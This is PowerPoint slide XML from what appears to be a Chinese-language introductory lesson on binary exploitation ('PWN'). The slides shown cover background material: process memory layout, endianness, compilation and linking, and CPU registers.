        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="Shape 740">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{516F7AAC-37C4-4C3D-840A-9E07E25B3D80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6503924" y="1331567"/>
              <a:ext cx="4790847" cy="5237782"/>
              <a:chOff x="4897550" y="1212775"/>
              <a:chExt cx="1363200" cy="3309752"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24" name="Shape 741">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF8E1F0C-1E5C-4FBD-B9EE-136FA129997A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1212775"/>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rPr>
                  <a:t>Kernel</a:t>
                </a:r>
                <a:endParaRPr dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Shape 742">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB864F51-F08D-48DF-B235-796BF6CF267A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1486975"/>
                <a:ext cx="1363200" cy="2742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Stack: </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>t</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1"/>
                  <a:t>ptr</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="Shape 743">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D882F786-2C4C-4F15-939C-B6D8F7527EF3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1761175"/>
                <a:ext cx="1363200" cy="603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 name="Shape 744">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34BA1D80-E668-46C6-992A-B6C7FDCB5A4C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2365075"/>
                <a:ext cx="1363200" cy="44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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28" name="Shape 745">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DBC97EC-4122-4EE0-99A7-3C6A101DBC68}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2807875"/>
                <a:ext cx="1363200" cy="603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 name="Shape 746">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B12AF7-6ABB-4F71-9EE5-2CDB56246F49}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3158070"/>
                <a:ext cx="1363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Heap: “</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1"/>
                  <a:t>deadbeef</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>”</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Shape 747">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{827A47B3-3393-43CF-BB19-F65D412C5CA8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3699927"/>
                <a:ext cx="1363200" cy="274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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>str</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Shape 748">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12B2411C-343C-466F-B821-23AADDFBB0A7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3974127"/>
                <a:ext cx="1363200" cy="2742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Text: main</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" dirty="0"/>
                  <a:t>sum</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" dirty="0"/>
                  <a:t>“</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>Hello </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                  <a:t>world!”</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" dirty="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="Shape 749">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5AFB405-9397-4105-9E7C-9D8FF80A0AEE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="4248327"/>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Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="33" name="Shape 750">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CB517B1-5875-40F8-88B9-1FDAECF47516}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="26" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1761175"/>
                <a:ext cx="0" cy="367800"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="34" name="Shape 751">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED8E43AF-266F-4456-A067-2ADA36DE75B3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="29" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="5579150" y="2823868"/>
                <a:ext cx="0" cy="334200"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Shape 746">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3078131-2CDB-4D7E-98CE-F3EF1CAF2874}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6503924" y="4832505"/>
              <a:ext cx="4790847" cy="433930"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">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dirty="0" err="1"/>
                <a:t>Bss</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>glb</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="矩形 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9B18F75-E807-43D6-9183-87010CB993F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5537759" y="4383289"/>
            <a:ext cx="1107996"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rPr>
              <a:t>载入内存</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="文本框 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F050D3-17AC-41CE-9071-1C4184676A8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987376" y="1044488"/>
            <a:ext cx="4493538"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程序数据是如何在内存中组织的</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="矩形 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{390AA778-64F1-4CDA-9651-D9CB7A278E7E}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>进程虚拟地址空间</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63917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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F050D3-17AC-41CE-9071-1C4184676A8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987376" y="1044488"/>
            <a:ext cx="2375971"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大端序与小端序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722D5597-3522-4BF8-9AA0-52EB644128C1}"/>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7930717" y="1886272"/>
            <a:ext cx="2667000" cy="2381250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B10552D-2956-4418-B093-D93BFC6ABE1D}"/>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1787687" y="1886272"/>
            <a:ext cx="2667000" cy="2381250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F96DEF0F-C629-4815-9C44-CA69CBEF1475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296460" y="4267522"/>
            <a:ext cx="1107996" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>小端序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="文本框 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FE6B6E5-7EBA-4C0B-B278-B44C0A40A939}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7376719" y="4267521"/>
            <a:ext cx="1107996" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>大端序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAC8EA4-2BF3-43AD-8396-6B65B94A7119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292361" y="4729186"/>
            <a:ext cx="3518821"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低地址存放数据低位、高地址存放数据高位</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我们所主要关注的格式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="文本框 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FBBA69C-C3BB-481B-BA6B-689E87EC6935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7376719" y="4729186"/>
            <a:ext cx="3518821"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低地址存放数据高位、高地址存放数据低位</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D104C273-E426-402A-B86D-C75E3EEBD6E0}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>程序的编译与链接</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89703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B020ADE-8E79-46B2-805C-C988FB5F7C11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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D62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="6875280" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PWN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4D326CA-BB67-4685-8B5E-C8156872EC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3755502" y="3293396"/>
            <a:ext cx="4286128" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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概述</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一次简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1278162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35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E20A92B-5D8C-4822-88F2-F312F8FBED61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918003" y="1505118"/>
            <a:ext cx="3585985" cy="1961451"/>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a:t>cpu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 137">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73369065-BE11-4285-9A3F-E213DFE42E5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3608388" y="1801754"/>
            <a:ext cx="1251477" cy="506314"/>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dirty="0"/>
              <a:t>Register</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 138">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25186C3C-10AD-4429-81C8-DDDCECA621ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3608388" y="2548879"/>
            <a:ext cx="1251477" cy="650566"/>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Condition Codes</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 139">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0B85644-AC0E-4720-90B0-D834111BA471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2193370" y="2116354"/>
            <a:ext cx="1251477" cy="654846"/>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Program Counter</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 140">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882AA08E-A0A6-4CB5-B5AD-902A38DD11D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7805715" y="1674969"/>
            <a:ext cx="2010229" cy="1614989"/>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Memory</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
